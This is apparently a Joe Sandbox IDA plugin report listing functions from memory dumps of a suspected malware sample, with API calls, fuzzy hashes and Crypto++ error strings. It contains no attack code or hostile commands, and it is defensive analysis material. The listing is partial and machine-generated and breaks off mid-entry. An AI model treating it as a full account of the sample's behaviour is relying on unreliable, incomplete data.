Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: CriticalSection$EnterLeave$ItemQueueUserWork
String ID:
API String ID: 584243675-0
Opcode ID: ba53f0952b54fca9f12d7c2dcbeef65fc4d4964c4ea093bb075791aceebc6b87
Instruction ID: d6bf0057bb1fca9965f5a799d0469700408b1a0d15c5369bd6a98e55b4271d91
Opcode Fuzzy Hash: ba53f0952b54fca9f12d7c2dcbeef65fc4d4964c4ea093bb075791aceebc6b87
Instruction Fuzzy Hash: 39218371605308AFCB44CFA4C945F9BBBF8FB85309F20855DE4568BA40D730E549CBA0

Function 6CE95AAC Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6CE95ACB

Part of subcall function 6CEF9533: std::exception::_Copy_str.LIBCMT ref: 6CEF954E

__CxxThrowException@8.LIBCMT ref: 6CE95ABC

Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7

__CxxThrowException@8.LIBCMT ref: 6CE95AE0

Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF

std::exception::exception.LIBCMT ref: 6CE95B18
__CxxThrowException@8.LIBCMT ref: 6CE95B2D

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Exception@8Throw$std::exception::exception$Copy_strExceptionRaise_mallocstd::exception::_
String ID:
API String ID: 921928366-0
Opcode ID: 3ee5495dbcf8ce0b75557e07aad86e85ef3d5aeef2b3703a81d01f5fa6260247
Instruction ID: a5075cd965e6048666bac046578db18823e68f6bcad5d1804d54f62252711aaa
Opcode Fuzzy Hash: 3ee5495dbcf8ce0b75557e07aad86e85ef3d5aeef2b3703a81d01f5fa6260247
Instruction Fuzzy Hash: C80152B29142086FDB04DFE4D841DEE77BCAF18344F50825DE819A7A00EB34D608CBB5

Function 6CEFF03B Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6CEFF047

Part of subcall function 6CEFEAE6: __getptd_noexit.LIBCMT ref: 6CEFEAE9
Part of subcall function 6CEFEAE6: __amsg_exit.LIBCMT ref: 6CEFEAF6

__amsg_exit.LIBCMT ref: 6CEFF067
__lock.LIBCMT ref: 6CEFF077
InterlockedDecrement.KERNEL32(?), ref: 6CEFF094
InterlockedIncrement.KERNEL32(06F01668), ref: 6CEFF0BF

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 7927c61cf09e9928abb17c3a8b9145bcfb3b6dd6647a158c262ba67ea245e863
Instruction ID: 9a7306bc1e6da8cbcc02c7b3134cbbfa8112e298f91eadcf5addbc03b2d4d4ee
Opcode Fuzzy Hash: 7927c61cf09e9928abb17c3a8b9145bcfb3b6dd6647a158c262ba67ea245e863
Instruction Fuzzy Hash: C9015B31E02611ABDB219F65800479A7BB0BF45B5DF354109E834A7B80DB28A946DBD1

Function 6CEFF7BC Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6CEFF7C8

Part of subcall function 6CEFEAE6: __getptd_noexit.LIBCMT ref: 6CEFEAE9
Part of subcall function 6CEFEAE6: __amsg_exit.LIBCMT ref: 6CEFEAF6

__getptd.LIBCMT ref: 6CEFF7DF
__amsg_exit.LIBCMT ref: 6CEFF7ED
__lock.LIBCMT ref: 6CEFF7FD
__updatetlocinfoEx_nolock.LIBCMT ref: 6CEFF811

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: e7bc5a374136b10d80fffc7739ebff0eb88ae935df2ac903d3eb38887f40efb9
Instruction ID: aefec6a8466c359d39d89cb7409c3ddea9869f737e12c95616f40c24b11415d2
Opcode Fuzzy Hash: e7bc5a374136b10d80fffc7739ebff0eb88ae935df2ac903d3eb38887f40efb9
Instruction Fuzzy Hash: 5CF09032A557049BDB21ABF88801B8DB7F06F0172CF30414DE474A7BD0DB28564BDAE5

Function 6CEDE6E0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 331COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 6CEDE76F
_memcpy_s.LIBCMT ref: 6CEDE78B

Strings

, xrefs: 6CEDE85A

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: _memcpy_s
String ID:
API String ID: 2001391462-3916222277
Opcode ID: 0bf15fa3b9ec785e00e78a5df0f78a5ceefb3fd9ce4d9823874b0f506039795f
Instruction ID: 661469243411d7505a5ebc053120b388979db21181f6bdd601ce6b2a5caefd89
Opcode Fuzzy Hash: 0bf15fa3b9ec785e00e78a5df0f78a5ceefb3fd9ce4d9823874b0f506039795f
Instruction Fuzzy Hash: EFC189756097028FD704CE28C88866AF7F1BF89318F254A2DE495C7740E734E94ACB82

Function 6CEF8B60 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 252COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 6CEF8C40
_memset.LIBCMT ref: 6CEF8C56
_memmove.LIBCMT ref: 6CEF8DA8

Strings

EncodingParameters, xrefs: 6CEF8CD6

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: _memcpy_s_memmove_memset
String ID: EncodingParameters
API String ID: 4034675494-55378216
Opcode ID: 711453e87c625484a2cecd253471d33cfcf70018e926e05acbf750a4428592a7
Instruction ID: 69d3d234abb25878fda325f47c5a0a972492be6a872415d32df394f190e214cb
Opcode Fuzzy Hash: 711453e87c625484a2cecd253471d33cfcf70018e926e05acbf750a4428592a7
Instruction Fuzzy Hash: 47916A746093419FD710CF29C880B5BBBE5AFDA708F24491EF8A887351D671E946CBA3

Function 6CED1200 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 244COMMON

Download Yara Rule

APIs

Part of subcall function 6CEED820: _memmove.LIBCMT ref: 6CEED930

Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE9402A

__CxxThrowException@8.LIBCMT ref: 6CED13D4

Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7

Part of subcall function 6CEC8D80: _malloc.LIBCMT ref: 6CEC8D8A
Part of subcall function 6CEC8D80: _malloc.LIBCMT ref: 6CEC8DAF

Strings

: ciphertext length of , xrefs: 6CED12E4
for this key, xrefs: 6CED1348
doesn't match the required length of , xrefs: 6CED1316

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: _malloc$ExceptionException@8RaiseThrowXinvalid_argument_memmovestd::_
String ID: doesn't match the required length of $ for this key$: ciphertext length of
API String ID: 1025790555-2559040249
Opcode ID: a5fd4bdef2507f04ee67d66bbccd401863d70cbe5f7906dd08ae65ae79941692
Instruction ID: 5ca35aa31ce5cd8008d7a9f61a7e75bf3e037b65e450d8dae4fbeb8623957530
Opcode Fuzzy Hash: a5fd4bdef2507f04ee67d66bbccd401863d70cbe5f7906dd08ae65ae79941692
Instruction Fuzzy Hash: 31A14B715083809FD324CB68C880BDBB7E9AFD9318F144A1DE19D87750EB70A909CBA3

Function 6CEC31D0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 213COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6CEC32BC
_memmove.LIBCMT ref: 6CEC32D0

Strings

i7l, xrefs: 6CEC31DB, 6CEC320B, 6CEC3253, 6CEC3285, 6CEC3346
i7l, xrefs: 6CEC322C, 6CEC3274, 6CEC3340

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: _malloc_memmove
String ID: i7l$i7l
API String ID: 1183979061-1099263514
Opcode ID: 4f328948bb7d1c0b4db8dda0dfe0f9c912db720f542cbb578eb97940c0a50180
Instruction ID: a6accad8fd330816e62c3993285e1a1d00fdfc5ef75a0b1e9456cabef31e2970
Opcode Fuzzy Hash: 4f328948bb7d1c0b4db8dda0dfe0f9c912db720f542cbb578eb97940c0a50180
Instruction Fuzzy Hash: D0816A71A042059FDB04CF58C580BDEBBB1BF45318F2982A9D8399BB51CB34E985CB92

Function 6CEFB47D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6CEFB50D

Part of subcall function 6CF01AA0: __87except.LIBCMT ref: 6CF01ADB

Strings

pow, xrefs: 6CEFB4E5, 6CEFB502

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 871a331679999f07660258749dfedf6e3763d9568c62ba2022bb871265e16d81
Instruction ID: 7869ba77b686de690443b655297e3911615cb003b00973334a020e19fa99c776
Opcode Fuzzy Hash: 871a331679999f07660258749dfedf6e3763d9568c62ba2022bb871265e16d81
Instruction Fuzzy Hash: 03515B71F1D20196C702AB15C96139A7BB4DB42B1CF30CE58E4F442FA8FB35C496AB46

Function 6CEA8560 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 179COMMON

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 6CEA88ED

Part of subcall function 6CEFA116: __mbstowcs_s_l.LIBCMT ref: 6CEFA12C

__cftoe.LIBCMT ref: 6CEA8911

Strings

P, xrefs: 6CEA8841
zX, xrefs: 6CEA865E

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: __cftoe$__mbstowcs_s_l
String ID: zX$P
API String ID: 1494777130-2079734279
Opcode ID: 600da2dc39a02c11ed3cb09d9df8cc4869f7546379b5080897c49b82e007d081
Instruction ID: fb1e68ab20017d269ea6c93623cba0c13c2092fa6f4d03053c0ec0ee3f0a67db
Opcode Fuzzy Hash: 600da2dc39a02c11ed3cb09d9df8cc4869f7546379b5080897c49b82e007d081
Instruction Fuzzy Hash: 479100B11087819FC376CF148880BEBBBF8BB84714F604A1DE19D4B280DB715645CF92

Function 6CEC89D0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6CEC8ABB
__CxxThrowException@8.LIBCMT ref: 6CEC8B82

Strings

PK_DefaultDecryptionFilter: ciphertext too long, xrefs: 6CEC8A8E
: invalid ciphertext, xrefs: 6CEC8B48

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Exception@8Throw
String ID: : invalid ciphertext$PK_DefaultDecryptionFilter: ciphertext too long
API String ID: 2005118841-483996327
Opcode ID: c60539e14770c5a6d3cd3ef17b8b3f97f42316f9a7f44b11d6353362b0dd523d
Instruction ID: 3f9310e67da7a8e1b81ac8b7e09ea7e92ad8e1c56e6749163d5e9bd4090c9650
Opcode Fuzzy Hash: c60539e14770c5a6d3cd3ef17b8b3f97f42316f9a7f44b11d6353362b0dd523d
Instruction Fuzzy Hash: A3512DB52047409FD324CF54C990EABB7F8EF99708F108A1DE59A97B50DB31E909CB62

Function 6CEC6B00 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE9402A

__CxxThrowException@8.LIBCMT ref: 6CEC6BA6

Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7

Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE94067
Part of subcall function 6CE94010: _memmove.LIBCMT ref: 6CE940C8

__CxxThrowException@8.LIBCMT ref: 6CEC6C56

Strings

NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes, xrefs: 6CEC6B33
RandomNumberGenerator: IncorporateEntropy not implemented, xrefs: 6CEC6BE3

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
String ID: NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes$RandomNumberGenerator: IncorporateEntropy not implemented
API String ID: 1902190269-184618050
Opcode ID: cacae5fb65bfa9f9c589f96f1afa23f22b211b4bf5ffa42cc7324cec47925f6d
Instruction ID: fad172b99cb8c640bac3b05e2185ff3d17a44b5569fe42ff82d2ff9f279bff65
Opcode Fuzzy Hash: cacae5fb65bfa9f9c589f96f1afa23f22b211b4bf5ffa42cc7324cec47925f6d
Instruction Fuzzy Hash: F65118B161C380AFC310DF69C880A5BBBF8BB99758F504A1EF4A587B90D775D908CB52

Function 6CE94E80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CE94EFC
std::_Xinvalid_argument.LIBCPMT ref: 6CE94F16
_memmove.LIBCMT ref: 6CE94F6C

Part of subcall function 6CE94D90: std::_Xinvalid_argument.LIBCPMT ref: 6CE94DA9
Part of subcall function 6CE94D90: std::_Xinvalid_argument.LIBCPMT ref: 6CE94DCA
Part of subcall function 6CE94D90: std::_Xinvalid_argument.LIBCPMT ref: 6CE94DE5
Part of subcall function 6CE94D90: _memmove.LIBCMT ref: 6CE94E4D

Strings

string too long, xrefs: 6CE94EF7, 6CE94F11

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: 28ab9481f51ece2f53513ce88e493a94977f30620f51a21dea07b053f6281ba5
Instruction ID: 03fc5178ff1b94c5bf7394d2d1f7f76c678ac5d06a668c4c90bc1483eddd3d70
Opcode Fuzzy Hash: 28ab9481f51ece2f53513ce88e493a94977f30620f51a21dea07b053f6281ba5
Instruction Fuzzy Hash: F631F5323106105BD7259E5CE89096AF7FAEFD1724730892FE4768BF80C731984583A1

Function 6CE92090 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE9402A

__CxxThrowException@8.LIBCMT ref: 6CE9211F

Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7

Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE94067
Part of subcall function 6CE94010: _memmove.LIBCMT ref: 6CE940C8

__CxxThrowException@8.LIBCMT ref: 6CE921BF

Strings

PK_MessageAccumulator: TruncatedFinal() should not be called, xrefs: 6CE9215D
PK_MessageAccumulator: DigestSize() should not be called, xrefs: 6CE920BD

Memory Dump Source

